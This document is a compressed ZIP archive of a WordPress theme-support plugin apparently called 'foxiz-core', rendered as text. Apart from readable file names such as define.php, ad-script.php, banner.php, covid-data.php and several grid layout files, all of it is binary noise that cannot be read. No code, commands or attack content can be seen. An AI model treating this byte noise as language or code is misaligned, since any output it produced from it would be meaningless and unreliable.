*7%ԥ$r̟$߁`jt**F5uU!Bэ j5o\NGi.w%2M-37q /ЍCa V%f`.5#Fza~fԥVo OSNMIj+.!,[;uyoƒ}uʦ߼5+ešܻ6߷¤VMv8CAuaNۢZ"La_L[Xq|9ʒ-ny'D3\(_/R> 3(z ߵimL^Y-?4f)~PKvrTfoxiz-core/assets/core.cssPKFaT@Ք foxiz-core/assets/core.jsXmo6^A Znc9X}Xf y ]%)-Z$TRbR7] &û玞>}揓ޜ>?:;9N?a=ql yRO ]춷ugJV]!zI(G"(YN_+f>C2S.C챨4,~; 5Ǐ-TI_EhKcFnS驩92~kVjˇc.Ob>x[<1mAN"XreB (Xx}9Z!<#!vˌz;/%x+,Bt`cEqGLW+[k>,$JGQݱM ;8HŠ[ԋ+7WTo(P=5Ѭxdpcf,_qp7hPz!t\Qy /N/Ha7Ȭ;>7R"5#$9 [}e5Hv"cEMw`G )BdȈ9 bJSZ NAndsPVeS*_AP7}y`Hba֓+Ь烂K#SSHiT!wӫgSP_'䟾mǝߛPpJѵ$p v-ܝKdxl+:޿5x}BwtJr $ _9%={G]!VUwoZ^RU_&yq;𫏄g(֪V۪N_Θ5gZPK]eT/:5foxiz-core/define.phpu_k0Wqes0?À*76)=6 ns>?˫m,%Alz5\{/k jۜV A_-);AZDIM\]X~4CDoݝΚxLf+b?'hs"(I0(QЮ Q}<;lCP5Z>h7Y'6hcѬ$Yq*(`(4λk{0mAaol&ScrmU]"|kXw_SUvYXRfzOOfYhܘv&0t6 \'+2ƦǣQ\zi̜e8L{*4*;w:^!Z o5Y9ɢq6 i CӶL}tu>Y׽~ﴱG6]tr}fm2V~|%Rz].q(0OM༛b#=OT)Ot=ySTL/d-Jvi,OPKSg+ףchlj3͗D]u gmPKZTb* "foxiz-core/elementor/ad-script.phpXmo"7 a*U2kګ\Z5ʬb+U{w˲9RS"3x~1fڔc 0q~bξBE|]p7tV6 )mB7:]1;8 6##lt$O[M8ֆO?Q w& /sj^"Fa",}4)8KbcUhtI.:6dXkIFTQ?{!doJ/6Hy|&k4^>hܶΖ^¢IZΡJY*ŲL Um)%:Z>g2e0j`nin1_PK[T Xfoxiz-core/elementor/banner.phpYOH.E#{wUI .L,m33uq iB-Z/3:W)D\qT͵(< ۣ!OmB7dQh\1_c_'V=l99^ LRI?<#8BOc $ %~SM8$rd0SZV52!H]mYj@2-ܩ1*kȦ)P]Nj8`Ba^zӻ3 @ (z h $x-&$pKbeW9eYHeWV+5֬ ȟדwfdD.՗td7tZm}Lj: 2 pSW2!5?xU>LحLGD^lGi DJt HNTtQ)<)Mie,㩚I]Nu`k6)A5ΫADD21K ]fhr߶t( }QI]7ZYԐHJI:'V$T%<@ _ *"2CX/FEֳRpxeOxfGkocGMӻ TU-D$J$̷\5L d^4,PKNTcfoxiz-core/elementor/base.phpWO7|Hbs~ -x5DJU!Yf׻g/G*wm}lTHzc&|qJaR բ0uq)cOkftky2bϛ81SwR F_`Y(*5Z|&.:\|^wš46X5mkO^6t6ڋ[RMbR$ݳF6Te(EMyvML/=* Z*F5FhN|lor3r[RJ.D9"5TXYSXugzi[q EsJIieoSmvjvەr}^7`]!/w1A/@̉"3ψ 5U-&rؐ:؇ϭ3Vk]6k>a " <531Yyeq)T֟e'߹;EgO~*DW?S{khwa~堜TWzw,.[5Jr*fUӖp5ǀmL.^[Yri5NVao)ՌpIBvK *(DfKiwTq)zB:fTULYA" _68pDSF>sz95hzhZt M?`_&u(2V?"l!Wa*m}po>q+Y0#ɹDnzNe-TR_e]9c5#snN|.WԞ$>):a9Upı3&> j DMlvʐΨXd!.йDp͸5s%tvNZ 'D{}5c"QQkpk':w]tz6W^luG S2[6|5|ysnpae@X-`9Maha2V-F>,-%:)ۓK&Sli}rd'i}XB >[y3dҙhڇZV^F%(v^#ڸ-*CY 8 E)j o$GHHN۹I0QWoSI $CHDs-אR.jkS0&a= mV*,ᅦ'߁,:NA7ziLwj4š656Z5(SÅE:Xz.>:^o%b TY]ZC`0V 4vc_\/FlHc gÊwN(]RVºuI+f G3a<ׇʆA[}1zλճ SINw&kL'@k  R}"d/JPuRwh8cAKfSQpHhȂEUtNb,La>~ Na j'KԣĉH K7|]@7g5ʾJ[i+e[7E.adlFf0H h}}uս (Qs R >ܝ͒醄۸&롕{U(h,V$ jEoP-Ul!"N DOPL@5vN%CW` xEAMѢb cRH |ntyO gw&b>QgJ2D=Mc)ǂ>[]زhY̯[sj!3Y_{TPHtRGyjN#V̌U(obT?k2>KO}L5.}B1'EVnh4aCѴ/w>6jvy=ZdCm`da^8@׉J;JS =&BP#*hp])z"I/U#rh%}kVe 9X@e,<44*tP6~&7B.́ڰzycPNb̪?b2ߔ;vd-%zr9OO^pӠi`?Dj.bY,1.Uοj\u,'%Ã0BigSH 8PN;ܰ12g@ӏ_XXώT<0\󨓡>)P/0BxUא[pSjMV†NkJ s5ǐ[Eoj2&fS8O(Mp g,Aaʹ~V S+ciVGbXfcu؍0z_1G›[\gyBoM("\-!g??4 T*4F3CFLXap&Ll̍8 [mqvuoWށ`aUBp8ʒDBδd!5ڷpcz/WjcنcD_Da;˅LE.#lJ/B nNh)^FQE_ az续ͨ,CX2DNlSi4,ɸut%|c^ %m8->Yιrow8ܶ2_3J V:.#zBZp]]y2jŋ0jB[0q=B_|h!Wa 0ͱSeD]L¥ݘ\(TOJS\6ףLbkDb<5E4J8m;mي%[Pj0WB5hԲ(2V+s"0Lyfl6=mymf4(M[N2ߌۻ0S22N"ohO  VϹ넢]~՟п6'%b%͚Z˵굲x^VIyKwP>6W'RUJkUnKU;ؠ 4]qiʱ7׬ʷn,cܟ;odmle5'2Z]:iS 7([1&JTJ'li"֕ TJ؜`L9}Ov&is#&!xϷ0)PZ]l\Ÿ$η5̻3KH2b-PR3%|?#y alWrggUXX>KuEKw4k`J fĖ =kqP ǔluz_H=hw6VOX5'0h{l i=?&Y.J8`E 7* dw0Ҥx$U9 ;ܷs]P7={B1;%%(xg,,eZ^{y"Njv,r4HMqzPKXT疖8%%foxiz-core/elementor/categories-2.phpZmo6a"J|Ln6H:DBeQ ,M"ɵ&[ĉ;>x_yv )Lm( J?⥚ Gñ!K%gIJf UvY*jJ.iFzDt4\]<8=zKT?{v`!`ZfgZUsM@o%M#+ (!'I4OCeaEmNT<O/FsL!eˤ0EH/(p1N !KxzO5+XKjgUp&i(iTtP֟Ju?y,B.@P-S3M)' oVOLhUaGVR$:?ޏGfs`I9a<+QS `yQn)x7>?s`9 3T,H{@E%#Hu<ÿ@2 )5|(]JF\# )W6qFge&3jrl<=E|HYqE&3\ɇ3 V'D_a7kk~)kŨ?]:iLHxDeu*J|+jEŤUYJ ry,Q<r˥Xe'M,u7̍_7-uvy6WށݪJڷ!<ֱ ,ҥsnC淋ȱlC5}@_,!w'h677̅d2_Z  V+i%7B'4ƅE. kQ yә?ak|v `51eD㐖\',S1_&TނMdfCkƯhtvP;,ǢLO󡒅 #5뽹(U ֫;I  6uik XkJڃEjʒtfAl͹ܑ(Yhh;R#c3C0>x[hFvɞ]*@!40Q;GD饑B96OUb &GjŎ~5bXTEqK2(w,7d*[O}CmUl]~[w9e7`VP¥cAUY\ޭգ`|1fT_p"3nK8ɂju [&mʊה7Z8(N BZ\PI&" WTJR=c[r~5n,L+ہ-ρ ?cWH5h{E4/mVShʢ:Gpx=d[sr $?7,kn >Doڗڞ8:`x<|hac}NqM4wjTsCLeA^k[v`\X魝[kľNv`ݱ.S/+nMؕzĊ5@c@+s`[7Y{*+fbp2^v{*o(Mƒ.ĺowK`c6nw5{)D$FzcSԳSxs!;W`a)17j㥜q=%xU. >7A4F/PKXTqc(%foxiz-core/elementor/categories-3.phpZmo6a"J[v]AA%&*IeKr-;ͺw|/``?A Sb[( >}$ \M8Ց`8~:6`49J 3;N>& -|OЃ S^puP?÷DȩK5'1Rˌpߤ%{՜a<[C@bHILBfIl5 { %eh&'lU#z0XA )ytN|9ʰ$lB$I/V_St- Y5E1t׳X88*t1<`֟ u?9K.p{ 'XoVy1؃/ s5Ž@@I:?ߍGf_(rP-yV<$S `qbn1x;>?s` SXTY$d!q 0 AL /K1ߵ[T<Ȉ tI:0SG1fysNv}|.jINXשsy%AP{>6qFgͥ&3jrl<=g b4M"O+|A9*ԊXh >f cM؏}v]ѥG%*[3TPj[.RJ ryCYأRy1 -KiSOx=Z#,q_n1 ?+-uvy6WҽNݪJڷ!) ѱnRyZE Xdl:5^/"<]\ef\E/m ||Pf+AiZ 25Ĩr 'q>La.dOGч{ifu$A0V[󼡣1Rf4mUnΥ k|-zjb_\WN,hʼcu|{ :!qfCkƯ_!*tzN-ؔJcT,Kv6AE"J1Xp6¿@"| 8>)]/j<`y*ÐrΡ6 ݄D4tIHSO]>)Gނ-$҄e> 2W@fWC֙Nvn+"Tvy \&[JPhOTH YXUv`.>{Nwi%wf 5+(%ȼCd+9Rzq]#K0j өX ^GKb@9EኵxD׮W什qq6b+c*$LBZZyH.s6WKs1Ŷ u@_x{/%h;θ'y-4%Y7OZ i97\8NEb}\\.S8{h>-AX4r@;s7a3yw(չ,Ȩq$R|m~W 1%l x->Yθ4i f5'nt_1Z5VU\48 eHL aV:T¡z\H'wogjW g?ΰ)DX…]\XIUW N'D$aKks2皮! WP8 ƌ(1fXȖ 9߀FF@HX {#8ARK!)7=qMWlT]TjĹmJWk\(sƆ 6R(\Q%=vajg??cIYί>Qc׿OVwlȌ[N%c9宖y] B>savGKqoPF#9<.0] IWMu5(xK Dr*]{yG>`mxImz$γMgmЧZ,, ŢF)`j^ÛyF$YRZ\I-iH'-FW _!&b\| zp IF,J_=Xt(7`R6\W+aO,C{ֳCLaA^١6C'Cho! ݴ-8߳=<%\Lo:>b :BˈF%a9U# g 7n<)ǁ`@`O\Ɓ+}9,m {qڮL0O-~o^`:c>GPr!uN l!Ҡ= 5sEzn@y,tEx$8>Y캘1Hv}p~4 VIJ)r ](ͽJt{n̥2*rLl6>"z)C&b )% 2`z%Jh}!Uެ`,[F/SVݛn߽M$Rܒ FdыK!ȕP)ew,¨5flԘaS,x5ZY=(HY>uݸ:?.5JO\;UzJƱOIAKiB*M_878ޮHmB'yKPt\NfeΈov-صa,KDW1V]jy_Y`8RD jG}_J/7^5~G0kϋZ \2R# 4Bݶcu h&qV8t8/DE84MlOw) 7ZvcWGs`7 8aON9AٝG&to`O&n|qNw5z!}T %sbZ,4 )kW3eRF5[>rA;'[h --/u`\Tc%kfTuZ{rd#6ڂu@#@tXǞQK2s%WRl[je'fNTGT&vdvc8̳r]~R[QsK3 ܊-qrFzn5Pɘ9IӕK[-8_ŀjDNke@^\A?lTW9o/[?~s\^K@o4z{LQj#_)qNrڜ~z }Ţ9&؋>`"/ٶvVX.:~ }&A#),09{ɐ3UfI m#qPKS vLMdI-2wiW*πr:jSwJ\% 6 ?RI1Ib F8=O' [u׫&b־|K yDs:xJġaHq8V"!YI8K%&_XqL<_18,/}9dvzPK$PT:lH g"foxiz-core/elementor/classic-1.php]moܸ< +iR `'ws)Uo}E@A`ig!ggO}EamVx1_\gh쯜c%uCeV|Pr w&'ࠕ#gjxo#dzOΥ{~0_׶NQ;!HeT-=ȷd_:O O!0<1\O+Ǡ.ж6tY-1L0S;8Gq2&X?kc+xK6hnDaa H(@Y,SdS"hVNgqCuH!e+DBpxb|Vdž rnq% up0G:,Pw)\p.gDž{Rg(cxJ.খn( 'V3cR+l(xiEV6 )E}=b_\^bfܓDdg F @q<gB Jjm09,C'CA5ӡ"")JT9RK .fDaWgdLKݑ 8֟J"ǖ|y42^qxhdf.pSȶ %]HRD؀1 dRXdȭ5T/1^B5z iBmB{4$L$,0]v 4l$kg) ݝ9C菉gY6IVaAdnjöqQjiPoM0Em%z>~<]$0 UZfIMPJݑo0;ZuM { shS]/*S)Τ80;/Dgh4-8.eZl>vm~({,U?7tCC%bQK!<|GtaO4V}k9D< )ʬ LTY<;N[4\5R:7֘0g7J 6y(ImGdc+%3y-? ca[L:Ы TҨQ^Ҿl؇89ՎS(:]i*//!<B"FXŦ'.7G` r`uS_8"M,/f]fTY7EF9Öb"{ 3€w,}_~*\NJYm lئ.%6KOCgǏ/ӫ=x+_&#%S)k9Tθ88O[35pu.QEZK*!)dc)Q̉ӬlK|%~a&Jl}~ԍugCЍnms-FrkQX_wVg7Dݟ&1K/+/Km!&uF$Y,74[ &Y lYtӖ4`Kj 6z&e wV-իqDlo\ К Mo[:U,ܯo-W[k&.$8X4 CoL՘KARdni)ў/*TZ#sa^k @h;6VDz=L@kgKk*vF*Jkة*] ޸6ʟ>7IDƳKK-v|+iC '`rDW? }2ATIL[Iu?BF8)Y92EEdܨo?iSUG8I(NgG2R GNmYA[Y*˔JoWN܁ ]'yIk׬mؤO'$̾aiȺy$…-1t`!H#R=8P?R2h_=3l5~obx{GcDxvsbh-s0rŇ؆D@11pPl/aHUIJFY- [4~]# ߶vTj8'ǬP7^+ٴ^f{RI7tNUST#EjKmϼZkV-9VLJ.mC$21:9/+K.ٰP<эE0S y]Њ3ݢTiJe坍:,HL"d/)0 |CuR%ze\J UwzV=A;kIvX\5ܺxWbRR<EIc̴|V7V A; _>:|ֱ5@S(ؘWx[p:E5N"}\Du"n})$̳Ci¡JZG6! kTPvK,l,3`Ս 6"lMR0lhBh>hI85-Py3L#j~/^.h|B;7Df_#46*._U_FovcyZub do0Zcs{PKjTPpï2/( iMAN#"j.*VG@b@J_2/Dٰ9Ҷ"B_5ȄWb 485I1Q s#XeI> oο0ȧ,Y*ǒOI8S\T+D}D6>Am*P$syޘ"Jm &DXk'M.&iY YY&v*&Z د›#\ 1ACA5[m^V B?s.0]uQSdCϣMc z3˄E50vOZaNZ`&yN`,Xycy LQ'n쾤{AI;[ <|@u BmbM1#X01+zdpow8![ᙦ^asߨB ̥j,BoJ^ۢCMmu;Gb[b:!6,Fլ|"h.f%-C֡hloG WuhEgὖpi/[.5ŜBM-n옟 q8!z<9ѩ"r8:R*!5z61rf|R}8Xi,mB+ }[T{(cfаmlYw0B1 y!ZShKꥤli?CůAS&߰9b/C&#+߰;aOXs 3Bu4 /AVآoTOj!6zL8:aي,olbeYTLh`HFCv6Qo;aܲGU< aQ+dj|e 쓮]+2ֳ"ΎX%.Yez][gvfc+*fq+*6 [+;M \C5́%y1stnsײY Y/0 ɕ^̪lS[ivh97O%ss}n#z60 ߂, x϶[GVqN}}f=1~9)iiMž`/n8xr S~fXVAs+2-`?ǟogv$$dvؖMNh>rˆyr|p36r3mabl(|'`*6' QArl;X@Z{ tl,A&m,A4_P6 Be[m[ %A[W^lpVӎ-nS"l{6הq-vbVȐV7 |Ĥ0S6fQw'U7{bdW>c1ĆyWp̳ oHOأX~N1l%x嘲GɁ 2+՘/+ڈé`x~)V 7`zuU_Z2igwV"qZuy}]F< sO.D,G3e#.t" kY;P#T,+e1K2ā.9xg R"#ή ,Tf!N!RXQ~ȅꗠTs&ݷ߽%{ˈxw.> =bnVpҮ~Փ]a OT…[؈KD+=d,9J!95@B~o̹9Jq*N Gӧ? ly@H:M }W}]mg?˂굆yU!hE-dx֨ $VuCܦJ|>!*14mFLFLF W#E;Hk142/vztrlu*m2H;kݢ LX:m_?w w`[ &sSNAQɰ+ݞq,V<+}lԼvL-n'ӓc%#jǩ`[+ ؾ?b_DFwBToePh dI0l?it2!؟]RS"b3*3А~ї%,x#KI| tWt5qaw&N~'H50F#F]A#/cϳц[& ]zH:~:QnS Suvz+Om,Jȯ.H=MMww昲:WKvD6V́ru_:rrw?\&D/}t( a Ւ l앆xƞWwOF8;4P"sfMHXqtMtT*}g9MĖ"\ 34xļ>͖xJ5Ao9jL6yNWܟWx $dBL āg& : |dMo*E?qsyK-DZu7KXhW":f{8VM(SJFOf7RÙđ[\Lぐyضn%߉?0Hq2M=ֶ?{E !L(RۺԬL2aaݕ )w2$4 bx"]ҕ#Q*:FL@}ICRHp~I(ZԿsZORHFD( %7WT̖Xu3D/2$#+ *bb&Q=$-`b.?=~lXFj*#&OD{-0@!' kl+e3g-1D&)Ft%AZ?55Qex(C:Ј`2Owe閸ԩ5gof+58d E( GCuPTjrD .EjI)֔G*%]ic :i+/M7F4!4yl`LœKw~y(8\*gMڹF7pv˒L8х0tS`,v͊5<.d1;藹IgYm^{RQNDE-D =+ʑS&N`5O-~1o'0,w7s%Sy7SJYkh+?d=~XwٓP2dpz߄ 4NG7kYb=A&Eyd ]_6ȠQXvx9Wnσ?ޱE<(ͫ%8Vj AӃ\}Uy>H`;\۰^b&}RD w,>puw9}}_`FqQ2W=$wr j|_>=DV@#}dAsQ% ې!IN(DmrC\:# G`K4=K<:@)(Ҙ*ڠEJԉJ.R-X )CFl-w:QW% ).oSlŽӾ&iR+E@ю)Q1ŦbO\kw^.o+JgP!jIկaYKp1%Yvݘx!yvET HHed*1V*<]8EWx;sl(s U'v)a[@~lX۰507T:I) JBb\&!#A9 ?PKZT9d#foxiz-core/elementor/covid-data.phpXmOF$T01! pU=I8^kwȡή9$Pyyٙٗ_~KN̆ 3֎pជ} ay?e Z"RDʿb1mB_E=bivn޹{yݩ3$:1G;)uY"z$AݝjĈ Yc*и&Iڍx4 f0ӆ^.PSc=1d!̵IuT*z>1a7 ')>̟Dj/ Ͱc#!WLcQ 1)ٸZ"@c8%ϕFy\'J3ӾBX75'G,d\͉X#~=YqjMJ&4:rB7^o}^&g/gaX`!"c [:+cʄ(W'X+Cr 2Wqj`"'F!DA J"6> %B7b#PEWj@?])ʀ4NlC)ӭ Ex,4xR?oz01c . 1^R7,2d-Wz2=Dgx?޺>;_ʩb:)TU:A:^}< :6`b#6X1*gRm׬1I~ܻhoSz[`DIHHbԣc,%)B' }hyBU&m7;8ӂBIs:+M=1+MX"V* (Ԇ+j)\IrgFY~#9?Vim|߫.M#ذ,[Yo4m Һ-؏%[ |HEVf߲NZ~p c7Ṋ1Vi# a^{Qk;El^\FEd*]{5hK]yB3 XS ު36ߍ& 3;ÐŅPĨ;8PqԑH}Bb;A8S%0Bkt:BZY,ƛSi,0dͤ +]C8p7vcP?VTb7:q>0AkeVL}=GGÓpru<{lH8n(Lsf\ijZ}ܓFM@c >RjX̱ ^⪁ǔU9rmSA@!p]&`RkTJTӔ0-%UH 4cL q+S;3HiSrjxy9ZpB\CsV3sDG\~?VuHR%efaO8K*ߪ;]]KR\[bG3UozΚ*- OyӦFzR]\LF ZR]-as&lv 4XwfmݹUUPKfT>%foxiz-core/elementor/font-resizer.phpWmo9 a:iIm'mGImtVwX~c. BB<̋7?eS@10S@S'h͹ Nt Uj&d)KP{u1.1Dq7pBU{aIt_vp }Ɍd0_QGr od^wڼ46(pdfyʭ Iꞔ-6)q8#ۡ.l@kh +.d-Ma,FC N2IӄK@ɻ&ٶShU^|'>'A8*F)Β !j1h_G0~9!]REZ9akUB&oI|fRŸ4kA`7ޟQ@1sF/Kq(~d_.yA0BYmO!p  \|z=cOOG٫mLJQϵOPHuH}8pxO?>:V/k"b,Ⱦų'#Α?^gYSD,u'J.7̳ܾq68_JFdn!֡Ϙb ^8b%G3[ xʰ9N7/#.#Ŕ>:N$9Nsp GH;`O(vEz8ǒŗF|(<,1]2tI Ԑ! g7#1eB#GNB,pY?2T&Hq{ .8(0i"5zFgOc&3uCM![*IB&& %u"#_KsfLLx9d/CcPXaRcY*ƣL"wtB9| C cB$L4$L uK.[:0o*M4ހ=S>ƏgY4I6xM F-"2! d1c#B8P|r,ޚ&!xPꓒKǎd|a._U`qV-3\1\󂐏QgT4&j,޻L›)S%CypzCxbS@D'\\$⍙iY:?f[ik(]# 94ߕ^1PͨL ^ y nf2Ei&̖1C.p0;NXWP[?zX77Bl  9Bݚj=8K2֡k0/cnH64 A_!YnYcm 7cϕ@idz&Zo@C^ز},)iWp.U#u&e 7v%pLoT5И Ckֶ۔&$8Y4  &jL S)Ra"4XShx(m݌Kӑ[1`]V - z cYN2BS$k[+R gPʖRږjVv.[o= o!GJAxwW@Εq[8T+܀u }`ħ͵$u!Fb UiLc7*F'SMhg#Nf:@JJ=~D%ZfZ V՛X sӛFw}݊u|wBBά-nlqV׎V-nDlOGeHy=C /JX3y/`m/wt*q\[ʫJ4ԚZț&<5p0–%[Y>mi#9Cc`؜3(+E*;J+~wkEm>]~cʈq$RL֊&.hod |L߫NrE\A,zCr)S#`\t%[b,+_Oh}l_ݟuu,9mw'J/nZ]X^$+h 2]]=^;͆:{x-?>}6Ň8óCd׀oG'nd V >PF'E!  fO%eJ9d(,RUniޛmbJu֜Y C*h?*Uۂ+P,qKuy,k;8KsmM֔t"=/K;6Y0P<\J>U ?\=kH^`hAπ.<(̲`yUXt DkWo$LP eƯ|ұ1H+?Q{}Qbxw]pRӵ8)@ pҟ\4t+Db=>N@mIv5rRPE`9WCzJ۝8xކ|em>}=D9\HeáZL}:YHWA/Ӳm3`C7EfnG%k g!zAM~cܤ%a.3o! ZUm&te )--zHp&Xqۅ{򋻶!ǂR-eB0| )rW`;["ػiwe{=Ǹʋ>d﹨ mrZ89NXo~t`Y.Iب>bi9،2]l]= "I{4:q֘ďhC&v@߹SLIUI3^yX>aA\e:+1In&Ssq!`;/5L]1-(JdBX4ˌA{ZׂA̺v(Vu!}TcnueO8p~ߣhE4:RxRu/IM>a(H\D?Uű^#,-Z9+ Am9ԇPKXOTI F{foxiz-core/elementor/grid-2.php]mo8\`Jn^{pRH\noq=DۺʢJQEM-Z(" rfH*{>XCSL~q˧O>BvO.O B p R:!Rϲm~ }م'ࠥ#d'O֥0X/R;!HuH-<ȷyO?>>Q/D#C4WAz9zl+BZӍgY [0@8۷1Al@6hCVEc(`l][ܐ"bJ~k74_9.>}O?'ߓ04,LD&S īWLW4dqa#p-%Kl(x2A6Sfz?<Hq11ggžOI9%dgG =D((F0ΉdKLD A3d(SNdLPp*ȑZJlz9'뇸?#CeB^XgT,w1$B)xlG)Yv9,Lf1lPet-Lt 8O3@a)EF_+}L̼h5 C|_"PXaRmY*֣L"^9B9z iBm&B4$L$,0]vt4al{kg);h Os?&wf')z F t%gTK2zh DfK@]^xo2D-OJvh$Ɔ; 򍖹|]тk^\D,TsDs)Ϋ@^@FMShpXj,#e+SQE=B&Oڕ)-t{&)ĦzׇyL$%?S= H䪟:'?lIV7A|ƇrJ_AmX͌e"podUyR9#c%´b@r,;IIuFŹ:su{Ij9j& [!,iQ{Mni0 2jj96Ї^^$s,F9d:˩6:CѩHPa}y YeTgE4ڗ5(6,!sNmH.!Z6P g ]5s."a6rlF[[iD>lX`&* !y۬9#( X|ua{B%aFЖe r Yj4Tv A~r3<<_sˀ7`d \`w~}ry$ jn,FNж)xkff%!ʷr( ߕ^1P5L ^ynf:% /t>cЄ^)]/6Zcwzn~uѝnnHf-1jr kΪV,Xż !Qt$=}ieEeq $ߴ'e ${T{R #_y%h .N ]bF&[H(b7< n#I0{*)Qf-_%H3rmg(եTIi'8bQXR-Ţwd1Nݟ`rZ+۵ͥ9VLJ&YSkJ:V/K;.ٰ0P<^J>U ?\=HVozhIπ.<(4`y:,q }DkWw$L#&ӡo;?5ͤԀ!Z) ޛrivpBıNj\ՇiIojs^!q ?L>MіdW[c'U֛qW(;O yGPmwKHv^f|myh5P-%TO{W/۞Ų]ú%j "zju5F[TC}Fmacܤ%a>eB J@Rp;ZF d(!M(/o1k!sYP~S|K@P p5`H9+HP0-be{=K>1ȶg>tykjrÝ8ޒ/&\?YMU7(=k`=^+tfMۉoH aoIknG<,{(H\$~ eDf?~I˹N,5_ cPKpOT/`_#foxiz-core/elementor/grid-box-1.php]moܸ< مߜ抵`Ǯws)Uue//ߤz[m!>3C E >ܠ06Kuzh|ɗϮB4|Q%)^h]CyAZ0DYmؗ]Kp Z>r1N?ں߶=qo3NR]s!&D ϵ2mO Gш k\yfގ*.жtY{"0ÈqO6& ~*?6=@mHъBCxeLM-VnHle澧k74 )$4ylH7#D&BƂ[<;2<@%\ ԝ*i \:oɅuyq>8OH 0EcL1o 2-?\BljydVږ/ʰ9O)gi,FCF)9?/}|Hr,3($(E3>L!BAO0mpN$oP6xXb2 d&C1r:G$cť;U9FRBgӫ<pX?*Ro8=&g9~%Jc= $!SH`Dטh5b!a&aP貣 c]M`F~ڿ[4`c }ǙaHo5(>e\ZC+`l }6 D^ =?]_LЄA^.CrQC 16|ؑ}W`ol]#ڽG"r=fѦz_T0&R\Hq`^@FMShpXj,#e+SQE{LM D +S{2kMRM9 IJ0 a0fhsomIX0(1sn%3Ȇu=Sm8uSū1&2> !Q*$Rmh/kPlYBR{ڐ\BXm P g ]5 ."a6jlF[{iD~ٰL1U$pCnYsFP6ꔥqOS!Kj- tfi,|nr{;{zsˀ7`d \`w}uri$ jn,FN}աmS..64,\݉B߁ıt2J7Bkw%$L|,:T=*ӂCׁ9}ށ>5Nb ´ď:VcЄ^)]/6Zcwzn~wуnHf-1jr kΪV,Xż !QtI/j_7|fB D_SLok#[4-PDj,+nK05܂+Hk}[|8"~chͅ5I-*׶Ά[;&$X4 CoL$՘ AfRDni)ўGx(ݜKӑ[3s]V  zKcYNҫƅ&HֵWYdOV-t-5TZ] o+GJ$"W@Εq[09T+؂M >}ħ$!Fb uiLң7*G'SM`x`#Nv:ّ{0H Khk:t\S%rR魪w9gI?Fw}ݚu~wBBάiqNWI+LM梁'$ZCq̉ԉ "6LinI2XnN>NUyu{^ZSyۢX4TM=u:6|zx)Z;M3؋/3Գ>?"djsK7ڙΟkM׷d\TvS#A2`L:` A/R!p8ќǛxk-b:n僐&9AʅMS}.Fla%r^9g,#Q`E+EW*;wrJrsѕ]FGC{q bQ4uEk|'pT}^8+_5r--L펌探KKsWl |IoAh .N ]bFi-XA$Xy@L7$=l٢tK׹A 1 B>weel.Ju)UgiZ{I7}XT)nU cYSקȯOWkr~4يI)$kjMI'2*8c|q ~^> +@ɇ #a1gM-90Ӆ埙,^Q%a Y.7 &_Ht(>Rz|(M-r JZἓԜvRr]g"q,ц8Y>%Sv,5^ǥG~h0,W$@~SlO[ClU kzV`]H I[G<,{Y!}(D``/WͿ E ",۶jM@].%8?-]9\n' pں߶=#qo3NR]s!&D ϵ2mO Gш k\yfގJ.[AmƳ,6E`9.83NlL^u/}!E+" c(`l`'mrCe+5#]SH!c+DBqd!h-]52dّ ,2`(uUGݩpay~>\X7Os [ \A&hx);[Cǀ+Y`2P808̪\ےt%6@V )D}7b<:|Hq1?}$'s;K } <zPPf6 x8'ŷZ|(<,1}2 TN1#1eR#Gj!r8 y7Rb&g9~%Jc=veg=0O;[ vP1~WDwPD3#9bw(>\F!ucnX0m?}mŝܤ:[:sm{Ij9j& ^Y/>A`, >ZO?%j.O, w6,e{WTl ̥/ހłXs)9ӟi9U}N8L[34p5'.r|+]- Z@] I5NUʔPu`NlwfMX0-ql7M{FkcS/V4A.z͝ɬ%FMc~YʞS%Xa?$J5 4\Mo ^(qjR7mmD}rCjH –!EmI&[pi`oR6pkUr|_Gv|Tд& QAax5˘Fb 3v!L y- V=%3}sIx:2gW23.UvJ~.GWG{tv =:O@"dh"B"{Sy;ZS!'q1CWE唩ݑQti czc:-A_?j1+6ͯŽAuu,>sN۸RxnW2[-RUnP@4.g|}6[J4=$>U~V,תXT,ƩS{Zܮ-h.qbR v5ɊZS҉ Nordg\_uφ=\̰?gM-90Ӆ埙,^Q%a Y.7 &_Ht(>|_%c3)5`VgI]FAre/OWXD5.VCത7QɅh\ 8L&hK* SBѳ6d[,g %Hi;/S{6<[S@M8T+z} q퉺.΀-YTX,f>'SW 025I`HV{g3zN-z JT݆I1ްءjCIM}|`ف.7vm7ˠQl߁My(JyxH(ʇ Nm"זYJ FlC!4l J/TV`AU[ϵpH\6td(価gJ"{kw)R%,Q1ɽ]ʄb3{HJS},V}^V|[E[n~b.[V*wc\e 7 ?0 B>d' ~Mծ_&ҿt?" aw%"T1v2: OLI2q2o]~ID1e{I!_\Ku+SWBNJgR5F.)62xU⠚ĭ]Z>{YW!2koaUJP(GcY]Z]^ïr^[B[7c(ٞ@@c ,.?U2u rK {" `׹|IPK$PT/#|%foxiz-core/elementor/grid-small-1.php]mo6,ɹv6i;y7hEuV/m ܥEX33̐p~ͷp:c- (&?y)?/a^]G Bm!p V|\䞂r~;]<g쿯~sve>FxG<מo/QHbL0U8?aN1 D֬Y+Z/'ǓfGb;(r , p ȓsݓ bspPģ)ZQThO,)r(rm"(5n)!!x8#h<51dćKO럲ˀ9 Qs%Mr[bzi_}x_b'&di!xb^8b~ &Ä̦<ǖ(pa2A5s\b..}%'s;[ } a| PpV;"=3+#> >z$`iȐsɘ2^qD[Len# j &*Ro8IALv ]JbǦ{48]3˧1ɺ-J]I!!?5RXddRKypm G"dvY09~"1 k<0Bj- [%zI|᱗N Z(?O!M1`bLTuwIi~ eGG˛F~ڿ[xs01q1F?Ho5(zq2.R-B6c%"uo.gwf64W\>(١It(Hƾ//tJl]#ƻG2|fіz^/R\Jq`w>^BFEaRhpj,#z3 oWȣ>jWȃc,rG&*2%#`x~PL,X#铫~onc;C%Yb2>/7BxjÚhf$',><WqDVF]Tg:EV xcnEqg17V8Pg7M56zfjn"훔^[<$ /55,/h9 {LD[I ar PLx6TX8,BHT*Ƴ "af=x٤6$Wo-r(k3ﭛ%oH;c/~57QeGA_w0m m ƐmVM:es(MS%aNЖe ai,|nz{;{z?JobAĔ |OI@4uZDi_1K5/+/Kl!b>ӐLo [L ͖hHV"5[5ݴ% Xj5N mήIr>"<1W К$F-6e 43,aP feLڅ s)q"4XShx(m݂K)ӑ0`]V K+cY3)[v sEY5neK)] k@/)G{D#^) _yLPȸ-XQw6Ą€Jz0TUZNҐzT#*ʹVG&1ֈࣩ&TV<'^;pv$%M?uxiJ3T\Tf]b,s{]fn:m;!!gv4 